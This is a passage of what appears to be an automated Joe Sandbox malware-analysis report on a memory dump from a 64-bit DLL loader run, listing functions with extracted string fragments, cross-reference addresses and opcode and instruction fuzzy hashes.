, xrefs: 0000000180014E7F, 0000000180014EDA
fzT, xrefs: 0000000180014CEF

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "4$f_$fzT$$
API String ID: 0-2251851231
Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001CF30 Relevance: 6.3, Strings: 5, Instructions: 69COMMON

Download Yara Rule

Strings

\, xrefs: 000000018001CFD2
eI$E, xrefs: 000000018001CFB1
[n, xrefs: 000000018001CF40
CX, xrefs: 000000018001CF47
8, xrefs: 000000018001D04E

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: CX$[n$\$eI$E$8
API String ID: 0-2019653245
Opcode ID: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
Instruction ID: b0bde2b46dd9974091b147c1be75073ae13835eaf58c76366964caef907b3f92
Opcode Fuzzy Hash: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
Instruction Fuzzy Hash: 4E318EB190074E8FDB44CF64C48A5CE7FB0FB68798F204618E859A6250D3B896A4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E76C Relevance: 5.7, Strings: 4, Instructions: 737COMMON

Download Yara Rule

Strings

$, xrefs: 000000018001F2F7
, xrefs: 000000018001EC4C
|nV, xrefs: 000000018001E94F
, xrefs: 000000018001E7AD

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $ $$$|nV
API String ID: 0-3281042611
Opcode ID: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
Instruction ID: 0fceca5626e055d2fbf750ad096c81a0ae15a929736b2a3d881e47323bd06dff
Opcode Fuzzy Hash: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
Instruction Fuzzy Hash: DA72FA71A0474C8BDF58CFA8C04AADDBBF5FB54344F00412DED4AAB298D7B4A91ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F3E0 Relevance: 5.4, Strings: 4, Instructions: 432COMMON

Download Yara Rule

Strings

u`, xrefs: 000000018000FCE6
VG, xrefs: 000000018000F95D
]>S, xrefs: 000000018000FBA2
R7i, xrefs: 000000018000FA02

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: R7i$VG$]>S$u`
API String ID: 0-1600827667
Opcode ID: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
Instruction ID: e69c950c419dafbc2894b984fb63416e0ad2d3a581be44541dc433b6a47a3fb9
Opcode Fuzzy Hash: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
Instruction Fuzzy Hash: DC32F1709097C88BDBF8DF24C8897DD7BE0FF48344F50515A984E9A694CBB86689CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800173F8 Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

BB, xrefs: 000000018001788F
., xrefs: 0000000180017964
z<, xrefs: 00000001800176EB
4, xrefs: 00000001800179BA

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: BB$z<$.$4
API String ID: 0-1591233792
Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002128 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

jP, xrefs: 000000018000214C
M[, xrefs: 00000001800023F9
xy, xrefs: 0000000180002465
Jx, xrefs: 00000001800022B1

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Jx$M[$jP$xy
API String ID: 0-882801676
Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001827C Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

&, xrefs: 00000001800184B7
@2, xrefs: 0000000180018500
Jn, xrefs: 0000000180018469
^, xrefs: 00000001800183F5

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &$@2$Jn$^
API String ID: 0-1816242221
Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CB8D Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

@, xrefs: 000000018000CE44
o=, xrefs: 000000018000CD18
64, xrefs: 000000018000CDD8
0e, xrefs: 000000018000CD96

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0e$64$@$o=
API String ID: 0-3194635012
Opcode ID: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
Instruction ID: 43be15bbb58683b0ec8bcd6d9d0e20e10858889a9d955228704270f701235499
Opcode Fuzzy Hash: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
Instruction Fuzzy Hash: 3B91E47051068C9FDB89DF24D88AADD3BB0FF58348F815319FC8AA6290C778D589CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028A04 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

kWa^, xrefs: 0000000180028B78
36H, xrefs: 0000000180028AE0
;, xrefs: 0000000180028B42
Yfr4, xrefs: 0000000180028A22

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;$36H$Yfr4$kWa^
API String ID: 0-3599472112
Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007AF0 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

bN, xrefs: 0000000180007BF0
?M, xrefs: 0000000180007B48
B , xrefs: 0000000180007C10
u, xrefs: 0000000180007AFC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?M$B $bN$u
API String ID: 0-4267052880
Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800264F8 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

U, xrefs: 0000000180026E54
(, xrefs: 0000000180026CE0
wU, xrefs: 0000000180026E3F

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ($U$wU
API String ID: 0-2031152664
Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016464 Relevance: 4.1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

y, xrefs: 0000000180016AAA
!d.#, xrefs: 00000001800165F6
U, xrefs: 0000000180016ACA

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: y$!d.#$U
API String ID: 0-1702114524
Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015B18 Relevance: 4.0, Strings: 3, Instructions: 261COMMON

Download Yara Rule

Strings

h, xrefs: 0000000180015F52
h^, xrefs: 0000000180015B32
=1Z, xrefs: 0000000180015B8A

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: =1Z$h^$h
API String ID: 0-2636329743
Opcode ID: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
Instruction ID: b01e88b6b57ba4d7dccfa73d8ad07d3cee0fb8b291d2e61316bf3d6cb9ca5404
Opcode Fuzzy Hash: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
Instruction Fuzzy Hash: 42E1D9705087C8CBEBBECF64C8897DA7BA8FB44708F10561DE94A9E258DB745749CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027EA4 Relevance: 4.0, Strings: 3, Instructions: 253COMMON

Download Yara Rule

Strings

o(, xrefs: 0000000180027F9A
V, xrefs: 0000000180027F18
bVZ, xrefs: 0000000180028141

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: V$bVZ$o(
API String ID: 0-1660054416
Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013FE0 Relevance: 4.0, Strings: 3, Instructions: 227COMMON

Download Yara Rule

Strings

#X, xrefs: 0000000180014170
$&], xrefs: 0000000180014371
m%K, xrefs: 00000001800141F5

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: #X$$&]$m%K
API String ID: 0-1065608980
Opcode ID: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
Instruction ID: 281ae2356dc6a3955f278cfb62bb8b0cbfc4af089bf5b994b6edc0547db548b7
Opcode Fuzzy Hash: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
Instruction Fuzzy Hash: 48C179B1A0460DCFDB68DF78D15A5DD7BF1BB48308F206129F8269A2A2E374A509CF54

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000569C Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

K#, xrefs: 00000001800058C8
cn , xrefs: 000000018000573A
LI, xrefs: 000000018000575A

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: K#$LI$cn
API String ID: 0-3773415493
Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025D84 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

^F, xrefs: 0000000180025DC4
Is, xrefs: 0000000180025DCC
$e, xrefs: 0000000180025EB9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $e$Is$^F
API String ID: 0-4110932142
Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021728 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

4, xrefs: 00000001800219C7
dUn, xrefs: 000000018002184B
0ZI, xrefs: 00000001800218B6

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0ZI$4$dUn
API String ID: 0-3362017604
Opcode ID: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
Instruction ID: 064bfcd7f6638f6f98711acfe7d0f42a6c132ae3c1731c2332aecbaa5a5ea63a
Opcode Fuzzy Hash: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
Instruction Fuzzy Hash: 0B712B7050C7888FD7B9DF28C5856DEBBF5FB85744F10491DE68A8B2A0CB769A44CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B520 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

j , xrefs: 000000018001B572
[_K&, xrefs: 000000018001B6AA
O, xrefs: 000000018001B6B8

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: O$[_K&$j
API String ID: 0-2002151384
Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006650 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

-h, xrefs: 0000000180006672
WT, xrefs: 0000000180006817
>"I, xrefs: 000000018000683A

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -h$WT$>"I
API String ID: 0-2979910649
Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029124 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

I$s, xrefs: 000000018002916E
-, xrefs: 0000000180029367
34, xrefs: 0000000180029346

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 34$I$s$-
API String ID: 0-2987712878
Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008FA0 Relevance: 3.8, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

sR, xrefs: 0000000180009081
v , xrefs: 000000018000903E
3W, xrefs: 00000001800090E2

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3W$sR$v
API String ID: 0-1518777123
Opcode ID: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
Instruction ID: c80d461967320ed9e8a283cc826d951d9acd29724fcff4159453b991850cd8cf
Opcode Fuzzy Hash: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
Instruction Fuzzy Hash: 7341B7B190034A8FDB48CF64C48A5DE7FB1FB58398F504619FC55A6290D3B896A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C1DC Relevance: 3.8, Strings: 3, Instructions: 88COMMON

Download Yara Rule

Strings

Da, xrefs: 000000018001C1FD
>, xrefs: 000000018001C204
p, xrefs: 000000018001C1F6

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >$Da$p
API String ID: 0-3088490888
Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015334 Relevance: 3.8, Strings: 3, Instructions: 87COMMON

Download Yara Rule

Strings

z, xrefs: 0000000180015340
Y, xrefs: 00000001800282F9
[?, xrefs: 00000001800153BD

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Y$[?$z
API String ID: 0-81702474
Opcode ID: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
Instruction ID: 17df8d7d90ce60fd82a33c040225e484019840e26e547c8a3bada95d9f576c07
Opcode Fuzzy Hash: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
Instruction Fuzzy Hash: CF41E2705187859BD398DF68C48991FBBF0FBC5388F906A1DF982866A0C7B4D958CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800159A0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

J_d, xrefs: 00000001800159D3
o, xrefs: 0000000180015A11
%i, xrefs: 0000000180015AC7

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %i$J_d$o
API String ID: 0-2302849290
Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1E0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

z, xrefs: 000000018000D9A8
~!, xrefs: 000000018000D9DC
%.&, xrefs: 000000018000D945

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %.&$~!$z
API String ID: 0-3431779881
Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004B4C Relevance: 3.8, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

B3, xrefs: 0000000180004B5F
., xrefs: 0000000180004C0F
J:, xrefs: 0000000180004C3F

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: .$B3$J:
API String ID: 0-3064689667
Opcode ID: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
Instruction ID: 182ec4a01b3342a6bdc382118e07b0b009bb3174144ecf8c9284c759066334ab
Opcode Fuzzy Hash: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
Instruction Fuzzy Hash: 1E41F3B090078E8FDB48CF24C88A0DE7BB0FB58358F114A1DEC56A6290D3B89664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B8D0 Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ie, xrefs: 000000018000B9A8
Ks, xrefs: 000000018000B90F
p7, xrefs: 000000018000B8E3

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Ks$ie$p7
API String ID: 0-1618259084
Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B898 Relevance: 3.8, Strings: 3, Instructions: 64COMMON

Download Yara Rule

Strings

v, xrefs: 000000018001B8B4
}j, xrefs: 000000018001B917
N=?S, xrefs: 000000018001B907

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: N=?S$v$}j
API String ID: 0-4092938293
Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800198DC Relevance: 3.8, Strings: 3, Instructions: 55COMMON

